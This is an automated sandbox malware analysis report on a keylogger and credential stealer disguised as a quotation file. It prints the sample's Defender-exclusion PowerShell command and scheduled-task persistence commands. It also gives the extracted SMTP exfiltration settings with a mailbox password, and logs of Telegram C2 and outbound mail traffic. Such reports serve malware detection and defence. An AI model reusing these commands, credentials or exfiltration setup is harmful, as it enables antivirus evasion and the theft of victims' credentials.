Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION REQUIRED_Enatel s.r.l..bat.exe

Overview

General Information

Sample name:QUOTATION REQUIRED_Enatel s.r.l..bat.exe
Analysis ID:1589989
MD5:dac368e84e853adec2a5bb1cd87cd1c6
SHA1:139c10cfa59c1e25039c02671010009de25a2690
SHA256:ece7de25d48e50e93d3d60f600a7676fe24a520916844f6826b4837ac8dd7ebc
Tags:exeuser-adrian__luca
Infos:

Detection

PureLog Stealer, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION REQUIRED_Enatel s.r.l..bat.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe" MD5: DAC368E84E853ADEC2A5BB1CD87CD1C6)
    • powershell.exe (PID: 2152 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3284 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 1532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • vTAuFgZcVE.exe (PID: 6752 cmdline: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe MD5: DAC368E84E853ADEC2A5BB1CD87CD1C6)
    • schtasks.exe (PID: 2788 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vbc.exe (PID: 3760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" MD5: 0A7608DB01CAE07792CEA95E792AA866)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000008.00000002.1662844895.00000000037AE000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2e809:$a1: get_encryptedPassword
          • 0x2eb26:$a2: get_encryptedUsername
          • 0x2e619:$a3: get_timePasswordChanged
          • 0x2e722:$a4: get_passwordField
          • 0x2e81f:$a5: set_encryptedPassword
          • 0x2feba:$a7: get_logins
          • 0x2fe1d:$a10: KeyLoggerEventArgs
          • 0x2fa82:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 27 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.vTAuFgZcVE.exe.2a986a8.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.2b18834.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.68c0000.5.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  12.2.vbc.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                  • 0x3bd4e:$a2: \Comodo\Dragon\User Data\Default\Login Data
                  • 0x3b3f1:$a3: \Google\Chrome\User Data\Default\Login Data
                  • 0x3b64e:$a4: \Orbitum\User Data\Default\Login Data
                  • 0x3c02d:$a5: \Kometa\User Data\Default\Login Data
                  Click to see the 43 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", ProcessId: 2152, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", ProcessId: 2152, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, ParentImage: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe, ParentProcessId: 6752, ParentProcessName: vTAuFgZcVE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmpA824.tmp", ProcessId: 2788, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Outbound SMTP Connections
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49752
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", ProcessId: 3284, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vTAuFgZcVE.exe", ProcessId: 2152, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe", ParentImage: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ParentProcessId: 5748, ParentProcessName: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vTAuFgZcVE" /XML "C:\Users\user\AppData\Local\Temp\tmp9C5C.tmp", ProcessId: 3284, ProcessName: schtasks.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-13T13:05:42.450306+010028033053Unknown Traffic192.168.2.849715104.21.112.1443TCP
                  2025-01-13T13:05:43.625419+010028033053Unknown Traffic192.168.2.849718104.21.112.1443TCP
                  2025-01-13T13:05:45.044845+010028033053Unknown Traffic192.168.2.849722104.21.112.1443TCP
                  2025-01-13T13:05:46.860599+010028033053Unknown Traffic192.168.2.849727104.21.112.1443TCP
                  2025-01-13T13:05:49.596058+010028033053Unknown Traffic192.168.2.849735104.21.112.1443TCP
                  2025-01-13T13:05:49.804688+010028033053Unknown Traffic192.168.2.849736104.21.112.1443TCP
                  2025-01-13T13:05:52.512798+010028033053Unknown Traffic192.168.2.849746104.21.112.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-13T13:05:39.859137+010028032742Potentially Bad Traffic192.168.2.849709132.226.8.16980TCP
                  2025-01-13T13:05:41.859041+010028032742Potentially Bad Traffic192.168.2.849709132.226.8.16980TCP
                  2025-01-13T13:05:42.077762+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
                  2025-01-13T13:05:43.062131+010028032742Potentially Bad Traffic192.168.2.849712132.226.8.16980TCP
                  2025-01-13T13:05:43.327755+010028032742Potentially Bad Traffic192.168.2.849717132.226.8.16980TCP
                  2025-01-13T13:05:44.515344+010028032742Potentially Bad Traffic192.168.2.849720132.226.8.16980TCP
                  2025-01-13T13:05:44.796487+010028032742Potentially Bad Traffic192.168.2.849721132.226.8.16980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-13T13:05:53.687599+010018100071Potentially Bad Traffic192.168.2.849749149.154.167.220443TCP
                  2025-01-13T13:05:54.883718+010018100071Potentially Bad Traffic192.168.2.849751149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000007.00000002.4059070573.0000000007371000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
                  Source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "director@igakuin.com", "Password": "wVCMFq@2wVCMFq@2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeReversingLabs: Detection: 39%
                  Multi AV Scanner detection for submitted file
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeReversingLabs: Detection: 39%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49714 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49716 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49749 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49751 version: TLS 1.2
                  Source: QUOTATION REQUIRED_Enatel s.r.l..bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: SnHY.pdb source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: Binary string: SnHY.pdbSHA256 source: QUOTATION REQUIRED_Enatel s.r.l..bat.exe, vTAuFgZcVE.exe.0.dr
                  Source: C:\Users\user\Desktop\QUOTATION REQUIRED_Enatel s.r.l..bat.exeCode function: 4x nop then jmp 06D0E745h0_2_06D0E8F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 053FF45Dh7_2_053FF4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 053FF45Dh7_2_053FF2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 053FFC19h7_2_053FF961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBE0A9h7_2_09DBDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBDC51h7_2_09DBD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB2C19h7_2_09DB2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB31E0h7_2_09DB310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBD3A1h7_2_09DBD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_09DB0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBFAB9h7_2_09DBF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBF661h7_2_09DBF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBEDB1h7_2_09DBEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB0D0Dh7_2_09DB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB1697h7_2_09DB0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBE501h7_2_09DBE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB31E0h7_2_09DB2DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DB31E0h7_2_09DB2DC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBD7F9h7_2_09DBD550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBCF49h7_2_09DBCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBF209h7_2_09DBEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 09DBE959h7_2_09DBE6B0
                  Source: C:\Users\user\AppData\Roaming\vTAuFgZcVE.exeCode function: 4x nop then jmp 0717D93Dh8_2_0717DAE9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0550F45Dh12_2_0550F4AC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0550F45Dh12_2_0550F2C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0550FC19h12_2_0550F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FE501h12_2_0A8FE258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F0D0Dh12_2_0A8F0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F1697h12_2_0A8F0B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F2C19h12_2_0A8F2968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F31E0h12_2_0A8F2DC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FF661h12_2_0A8FF3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FEDB1h12_2_0A8FEB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FD3A1h12_2_0A8FD0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FFAB9h12_2_0A8FF810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_0A8F0040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FDC51h12_2_0A8FD9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F31E0h12_2_0A8F310E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FE959h12_2_0A8FE6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FE0A9h12_2_0A8FDE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FF209h12_2_0A8FEF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FCF49h12_2_0A8FCCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8F31E0h12_2_0A8F2DBB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then jmp 0A8FD7F9h12_2_0A8FD550

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49749 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49751 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.vTAuFgZcVE.exe.37ae800.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.390b678.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.QUOTATION REQUIRED_Enatel s.r.l..bat.exe.382d660.4.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.8:49752 -> 208.91.199.223:587
                  Source: global trafficTCP traffic: 192.168.2.8:60445 -> 208.91.198.143:587
                  Source: global trafficTCP traffic: 192.168.2.8:60441 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
